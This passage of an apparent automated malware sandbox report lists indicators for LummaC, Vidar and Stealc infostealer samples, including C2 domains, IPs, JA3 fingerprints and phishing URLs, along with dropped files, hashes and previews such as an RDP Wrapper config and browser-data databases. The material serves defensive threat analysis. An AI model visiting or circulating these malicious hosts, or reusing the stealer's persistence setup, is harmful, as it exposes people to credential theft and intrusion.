	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
fragnantbui.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://attnet-101599.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	162.159.136.66
	https://lothanse-heracklarne.pages.dev/help/contact/547074160798771	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://verdadeoculta.com.br/redirect.php?v=1f9664cf5aef491&email=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://devssite.com/ddstore/index.html?email=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://id8.tingkehvpn.us.kg/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://id6.tingkehvpn.us.kg/	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://full-videoviral.group-vvip.my.id/	Get hash	malicious	Unknown	Browse	172.67.217.141
	http://uphooldlogua.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	104.16.117.116
	http://home-100945.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	https://novo.oratoriomariano.com/novo/92164/Entry.html	Get hash	malicious	Unknown	Browse	104.17.25.14
CLOUDFLARENETUS	http://attnet-101599.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	162.159.136.66
	https://lothanse-heracklarne.pages.dev/help/contact/547074160798771	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://verdadeoculta.com.br/redirect.php?v=1f9664cf5aef491&email=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://devssite.com/ddstore/index.html?email=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://id8.tingkehvpn.us.kg/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://id6.tingkehvpn.us.kg/	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://full-videoviral.group-vvip.my.id/	Get hash	malicious	Unknown	Browse	172.67.217.141
	http://uphooldlogua.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	104.16.117.116
	http://home-100945.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	https://novo.oratoriomariano.com/novo/92164/Entry.html	Get hash	malicious	Unknown	Browse	104.17.25.14
CLOUDFLARENETUS	http://attnet-101599.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	162.159.136.66
	https://lothanse-heracklarne.pages.dev/help/contact/547074160798771	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://verdadeoculta.com.br/redirect.php?v=1f9664cf5aef491&email=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://devssite.com/ddstore/index.html?email=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://id8.tingkehvpn.us.kg/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://id6.tingkehvpn.us.kg/	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://full-videoviral.group-vvip.my.id/	Get hash	malicious	Unknown	Browse	172.67.217.141
	http://uphooldlogua.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	104.16.117.116
	http://home-100945.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	https://novo.oratoriomariano.com/novo/92164/Entry.html	Get hash	malicious	Unknown	Browse	104.17.25.14
AS-PUBMATICUS	http://attnet-101599.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	185.64.191.210
	http://uphooldlogua.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	185.64.191.210
	http://home-100945.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	http://shaw-106427.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	https://phanetomwllet.gitbook.io/us	Get hash	malicious	Unknown	Browse	198.47.127.205
	http://sky-108090.weeblysite.com/	Get hash	malicious	Unknown	Browse	198.47.127.205
	http://btinternet-101458.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	http://bt-104106.weeblysite.com/	Get hash	malicious	Unknown	Browse	198.47.127.205
	http://login-ourtime.members-datings.workers.dev/v3/aboutonlinedating	Get hash	malicious	HTMLPhisher	Browse	185.64.191.210
	https://gimennlouin.gitbook.io/us	Get hash	malicious	Unknown	Browse	185.64.191.210

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	http://pldw.peoplebankweb.cc/	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Adware.DownwareNET.4.15389.24193.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://dev-55550141554.pantheonsite.io/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://creditoman-bc.om/	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://uphooldlogua.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://phanetomwllet.gitbook.io/us	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://coinmasteryou43.blogspot.com.es/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://9x.now.sh/d5Oa	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://geminininilogiiinni.godaddysites.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://pub-14b5071e5a78406a9a92a00be9141089.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.77.130 172.67.162.108 188.114.97.3 172.67.128.144 172.67.132.32 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.21.77.130 172.67.162.108 188.114.97.3 172.67.128.144 172.67.132.32 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.77.130 172.67.162.108 188.114.97.3 172.67.128.144 172.67.132.32 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.77.130 172.67.162.108 188.114.97.3 172.67.128.144 172.67.132.32 188.114.96.3 104.102.49.254 172.67.194.216
	Baylor financial-RemittanceSeptember 26, 2024_-YTRKOKQTQALJDQKMPCNJ.xlsx	Get hash	malicious	Unknown	Browse	104.21.77.130 172.67.162.108 188.114.97.3 172.67.128.144 172.67.132.32 188.114.96.3 104.102.49.254 172.67.194.216
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.77.130 172.67.162.108 188.114.97.3 172.67.128.144 172.67.132.32 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC	Browse	104.21.77.130 172.67.162.108 188.114.97.3 172.67.128.144 172.67.132.32 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.77.130 172.67.162.108 188.114.97.3 172.67.128.144 172.67.132.32 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.77.130 172.67.162.108 188.114.97.3 172.67.128.144 172.67.132.32 188.114.96.3 104.102.49.254 172.67.194.216
	http://google.com	Get hash	malicious	LummaC	Browse	104.21.77.130 172.67.162.108 188.114.97.3 172.67.128.144 172.67.132.32 188.114.96.3 104.102.49.254 172.67.194.216
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Adware.DownwareNET.4.15389.24193.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\RDP Wrapper\rdpwrap.dll	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	smss.exe	Get hash	malicious	RMSRemoteAdmin, RDPWrap Tool, xRAT	Browse
	CVE-2024-38143 poc.exe	Get hash	malicious	Codoso Ghost, UACMe	Browse
	LisectAVT_2403002A_44.exe	Get hash	malicious	AveMaria, UACMe	Browse
	6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe	Get hash	malicious	AveMaria, UACMe	Browse
	234880953-042446-sanlccjavap0003-3849.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
	YQR4CA11sP.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
	jYHfnNP0MN.exe	Get hash	malicious	AveMaria, Blank Grabber, PrivateLoader, UACMe	Browse
C:\ProgramData\BKKFCFBKFC.exe	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	5.884975745255681
Encrypted:	false
SSDEEP:	3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
MD5:	461ADE40B800AE80A40985594E1AC236
SHA1:	B3892EEF846C044A2B0785D54A432B3E93A968C8
SHA-256:	798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
SHA-512:	421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: smss.exe, Detection: malicious, Browse Filename: CVE-2024-38143 poc.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_44.exe, Detection: malicious, Browse Filename: 6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe, Detection: malicious, Browse Filename: 234880953-042446-sanlccjavap0003-3849.exe, Detection: malicious, Browse Filename: YQR4CA11sP.exe, Detection: malicious, Browse Filename: jYHfnNP0MN.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Program Files\RDP Wrapper\rdpwrap.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	443552
Entropy (8bit):	5.4496544667416975
Encrypted:	false
SSDEEP:	768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
MD5:	92BC5FEDB559357AA69D516A628F45DC
SHA1:	6468A9FA0271724E70243EAB49D200F457D3D554
SHA-256:	85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
SHA-512:	87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\ProgramData\BAFCGIJDAFBK\FHDAEH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFCGIJDAFBK\KKFHJD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFCGIJDAFBK\KKJKEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKKFCFBKFC.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\ProgramData\CFHIIEHJKK.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	7.6533863237352735
Encrypted:	false
SSDEEP:	1536:a7xe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/prrDDhLO6kiz:a7x0I26z/8uz22gaxH2zpXD1O6Jz
MD5:	3FCBAACCA9CC6DCCF0649F5ABB8B73EB
SHA1:	B0C5D6768B041C992DB13ADBF9D1152EAE2DCFE4
SHA-256:	A50E7F2B8528539D7F9EEE179010F35C20AD3854E773E40A98023D594113653A
SHA-512:	055313B85862F58573A589785B3D6A63FF41B105FD78BD7956DFF7EC532075CC03954AE492F50562ED5FAA6850656570A22552C75A5E47EA768CED8893768AC6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\CFHIIEHJKK.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............#... ...@....@.. ....................................`..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H............&...........-...............................................(#.....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r0..p(....(O...(.....r...p(....(....r...p(....oE...:....r...p(....r...p(.....r...p(.....{....r...p(....(X...oY...(Z...b.:....rZ..p(.....o[....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\ProgramData\CGHDAKKJJJKJ\AEHIDA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	9370
Entropy (8bit):	5.514140640374404
Encrypted:	false
SSDEEP:	192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
MD5:	7E44458E0A8A3A7D10875BC3B7AE72D1
SHA1:	E5E6AC8676EE3761DAB13A10EB7573C19F48D297
SHA-256:	21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
SHA-512:	012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\CGHDAKKJJJKJ\AFCBAE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\BGIJDG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\BKKFCF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\DHCAEC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
